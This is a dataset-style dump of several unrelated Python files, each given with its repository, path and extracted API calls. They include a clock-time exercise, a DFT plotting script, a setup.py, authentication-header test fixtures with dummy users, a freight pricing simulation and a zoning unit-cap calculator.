| [((69, 4, 69, 25), 'riscv_ctg.log.logger.level', 'logger.level', ({(69, 17, 69, 24): 'verbose'}, {}), '(verbose)', False, 'from riscv_ctg.log import logger\n'), ((71, 4, 71, 70), 'riscv_ctg.log.logger.info', 'logger.info', ({(71, 16, 71, 69): '"""Copyright (c) 2020, InCore Semiconductors Pvt. Ltd."""'}, {}), "('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')", False, 'from riscv_ctg.log import logger\n'), ((72, 4, 72, 39), 'riscv_ctg.log.logger.info', 'logger.info', ({(72, 16, 72, 38): '"""All Rights Reserved."""'}, {}), "('All Rights Reserved.')", False, 'from riscv_ctg.log import logger\n'), ((73, 4, 73, 58), 'riscv_ctg.log.logger.info', 'logger.info', ({(73, 16, 73, 57): '"""Copying env folder to Output directory."""'}, {}), "('Copying env folder to Output directory.')", False, 'from riscv_ctg.log import logger\n'), ((74, 14, 74, 37), 'os.path.join', 'os.path.join', ({(74, 27, 74, 30): 'out', (74, 31, 74, 36): '"""env"""'}, {}), "(out, 'env')", False, 'import os, re\n'), ((90, 18, 90, 54), 'riscv_ctg.utils.load_yaml', 'utils.load_yaml', ({(90, 34, 90, 53): 'const.template_file'}, {}), '(const.template_file)', True, 'import riscv_ctg.utils as utils\n'), ((91, 10, 91, 50), 'riscv_isac.cgf_normalize.expand_cgf', 'expand_cgf', ({(91, 21, 91, 29): 'cgf_file', (91, 30, 91, 34): 'xlen', (91, 35, 91, 49): 'list_duplicate'}, {}), '(cgf_file, xlen, list_duplicate)', False, 'from riscv_isac.cgf_normalize import expand_cgf\n'), ((92, 11, 92, 29), 'multiprocessing.Pool', 'mp.Pool', ({(92, 19, 92, 28): 'num_procs'}, {}), '(num_procs)', True, 'import multiprocessing as mp\n'), ((56, 14, 56, 79), 'riscv_ctg.generator.Generator', 'Generator', ({(56, 24, 56, 34): 'formattype', (56, 35, 56, 42): 'op_node', (56, 43, 56, 49): 'opcode', (56, 50, 56, 59): 'randomize', (56, 60, 56, 64): 'xlen', (56, 65, 56, 69): 'flen', (56, 70, 56, 78): 'base_isa'}, {}), '(formattype, op_node, opcode, randomize, xlen, flen, base_isa)', False, 'from riscv_ctg.generator import Generator\n'), ((75, 11, 75, 34), 'os.path.exists', 'os.path.exists', ({(75, 26, 75, 33): 'env_dir'}, {}), '(env_dir)', False, 'import os, re\n'), ((76, 8, 76, 42), 'shutil.copytree', 'shutil.copytree', ({(76, 24, 76, 33): 'const.env', (76, 34, 76, 41): 'env_dir'}, {}), '(const.env, env_dir)', False, 'import shutil\n'), ((80, 38, 80, 49), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
ASHISHKUMAR2411/Programming-CookBook | Back-End/Python/timers/clock_named_tuple.py | 9c60655d64d21985ccb4196360858d98344701f9 | from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
# Adds Current time plus End Time Total
end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
# Calculates Total days passed
days = int(end_hours/24)
# Calculates New Time
new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')]
new_time_joined = ''.join(new_time_array)
end_period = [period]
# Clock, calculates the days elapsed
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
# Figure out whether is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30) | [((4, 12, 4, 85), 'collections.namedtuple', 'namedtuple', ({(4, 23, 4, 34): '"""MainTimer"""', (4, 36, 4, 84): '"""new_time_joined, end_period, new_weekday, days"""'}, {}), "('MainTimer', 'new_time_joined, end_period, new_weekday, days')", False, 'from collections import namedtuple\n')] |
jlaumonier/mlsurvey | mlsurvey/visualize/__init__.py | 373598d067c7f0930ba13fe8da9756ce26eecbaf | from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| [] |
phunc20/dsp | stanford/sms-tools/lectures/02-DFT/plots-code/idft.py | e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886 | import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| [((5, 0, 5, 44), 'sys.path.append', 'sys.path.append', ({(5, 16, 5, 43): '"""../../../software/models/"""'}, {}), "('../../../software/models/')", False, 'import sys\n'), ((11, 4, 11, 14), 'numpy.ones', 'np.ones', ({(11, 12, 11, 13): 'N'}, {}), '(N)', True, 'import numpy as np\n'), ((13, 9, 13, 29), 'dftModel.dftAnal', 'DFT.dftAnal', ({(13, 21, 13, 22): 'x', (13, 24, 13, 25): 'w', (13, 27, 13, 28): 'N'}, {}), '(x, w, N)', True, 'import dftModel as DFT\n'), ((14, 4, 14, 27), 'dftModel.dftSynth', 'DFT.dftSynth', ({(14, 17, 14, 19): 'mX', (14, 21, 14, 23): 'pX', (14, 25, 14, 26): 'N'}, {}), '(mX, pX, N)', True, 'import dftModel as DFT\n'), ((16, 0, 16, 31), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 0, 17, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(17, 12, 17, 15): '(311)'}, {}), '(311)', True, 'import matplotlib.pyplot as plt\n'), ((18, 0, 18, 56), 'matplotlib.pyplot.title', 'plt.title', ({(18, 10, 18, 55): '"""positive freq. magnitude spectrum in dB: mX"""'}, {}), "('positive freq. magnitude spectrum in dB: mX')", True, 'import matplotlib.pyplot as plt\n'), ((22, 0, 22, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(22, 12, 22, 15): '(312)'}, {}), '(312)', True, 'import matplotlib.pyplot as plt\n'), ((23, 0, 23, 46), 'matplotlib.pyplot.title', 'plt.title', ({(23, 10, 23, 45): '"""positive freq. phase spectrum: pX"""'}, {}), "('positive freq. phase spectrum: pX')", True, 'import matplotlib.pyplot as plt\n'), ((25, 0, 25, 35), 'matplotlib.pyplot.axis', 'plt.axis', ({(25, 9, 25, 34): '[0, pX.size, -np.pi, np.pi]'}, {}), '([0, pX.size, -np.pi, np.pi])', True, 'import matplotlib.pyplot as plt\n'), ((27, 0, 27, 16), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(27, 12, 27, 15): '(313)'}, {}), '(313)', True, 'import matplotlib.pyplot as plt\n'), ((28, 0, 28, 38), 'matplotlib.pyplot.title', 'plt.title', ({(28, 10, 28, 37): '"""inverse spectrum: IDFT(X)"""'}, {}), "('inverse spectrum: IDFT(X)')", True, 'import matplotlib.pyplot as plt\n'), ((32, 0, 32, 18), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((33, 0, 33, 23), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(33, 12, 33, 22): '"""idft.png"""'}, {}), "('idft.png')", True, 'import matplotlib.pyplot as plt\n'), ((34, 0, 34, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((19, 9, 19, 27), 'numpy.arange', 'np.arange', ({(19, 19, 19, 26): 'mX.size'}, {}), '(mX.size)', True, 'import numpy as np\n'), ((24, 9, 24, 27), 'numpy.arange', 'np.arange', ({(24, 19, 24, 26): 'pX.size'}, {}), '(pX.size)', True, 'import numpy as np\n'), ((29, 9, 29, 29), 'numpy.arange', 'np.arange', ({(29, 19, 29, 23): '(-N / 2)', (29, 25, 29, 28): '(N / 2)'}, {}), '(-N / 2, N / 2)', True, 'import numpy as np\n'), ((12, 24, 12, 43), 'numpy.arange', 'np.arange', ({(12, 34, 12, 38): '-N / 2', (12, 39, 12, 42): 'N / 2'}, {}), '(-N / 2, N / 2)', True, 'import numpy as np\n')] |
jerzydziewierz/typobs | setup.py | 15fa697386f5fb3a1df53b865557c338be235d91 | # setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="[email protected]",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | [((16, 13, 16, 28), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
ehelms/system-baseline-backend | tests/fixtures.py | 729cc8ba53119a7ed397fb3ea3d46f9ecedb8528 | """
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1"
"Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl"
"bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz"
"dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl"
"Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf"
"b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi"
"TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz"
"ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50"
"aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50"
"IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg=="
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij"
"EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl"
"cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi"
"J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6"
"IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW"
"1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt"
"aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG"
"9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn"
"X2lkIjoiNTY3OCJ9fX0KCg=="
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi"
"NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7"
"ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp"
"cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp"
"c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi"
"OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi"
"dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf"
"aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1"
"c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv"
"bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp"
"c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0"
"cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0"
"X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu"
"X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l"
"In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readablity):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO"
"nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm"
"9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo"
"iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX"
"2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC"
"JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo="
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
| [] |
Elfenreigen/MCM-2021-C-SJTU-Test | 2021-02-03/2.py | 98e3b14dbe7bb0ab4a76245d14e4691050704ac9 | #####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| [((9, 5, 9, 35), 'pandas.read_excel', 'pd.read_excel', ({(9, 19, 9, 34): '"""CF66-all.xlsx"""'}, {}), "('CF66-all.xlsx')", True, 'import pandas as pd\n'), ((11, 8, 11, 43), 'pandas.read_excel', 'pd.read_excel', ({(11, 22, 11, 42): '"""CF66-ordinary.xlsx"""'}, {}), "('CF66-ordinary.xlsx')", True, 'import pandas as pd\n'), ((12, 5, 12, 55), 'pandas.read_excel', 'pd.read_excel', ({(12, 19, 12, 54): '"""6. Existing pricing strategy.xlsx"""'}, {}), "('6. Existing pricing strategy.xlsx')", True, 'import pandas as pd\n'), ((47, 2, 47, 29), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((51, 17, 51, 48), 'pandas.to_datetime', 'pd.to_datetime', ({(51, 32, 51, 47): "i['WBL_AUD_DT']"}, {}), "(i['WBL_AUD_DT'])", True, 'import pandas as pd\n'), ((52, 3, 52, 30), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((61, 3, 61, 30), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n')] |
qrebjock/fanok | tests/test_selection.py | 5c3b95ca5f2ec90af7060c21409a11130bd350bd | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
| [((8, 1, 23, 1), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(9, 4, 9, 28): '"""w, q, offset, expected"""', (10, 4, 22, 5): '[([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1,\n 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, \n 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], \n 0.15, 0, 3), ([-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, \n 0.31, -1.38], 0.1, 0, 1.93)]'}, {}), "('w, q, offset, expected', [([1, 2, 3, 4, 5], 0.1, 0,\n 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0,\n np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), (\n [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ([-1.52, \n 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93)])", False, 'import pytest\n'), ((25, 8, 25, 19), 'numpy.array', 'np.array', ({(25, 17, 25, 18): 'w'}, {}), '(w)', True, 'import numpy as np\n'), ((26, 16, 26, 68), 'fanok.selection.adaptive_significance_threshold', 'adaptive_significance_threshold', (), '', False, 'from fanok.selection import adaptive_significance_threshold\n')] |
fintelia/habitationi | unitcap/unit_cap.py | 7dd15ecbab0ad63a70505920766de9c27294fb6e | #!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
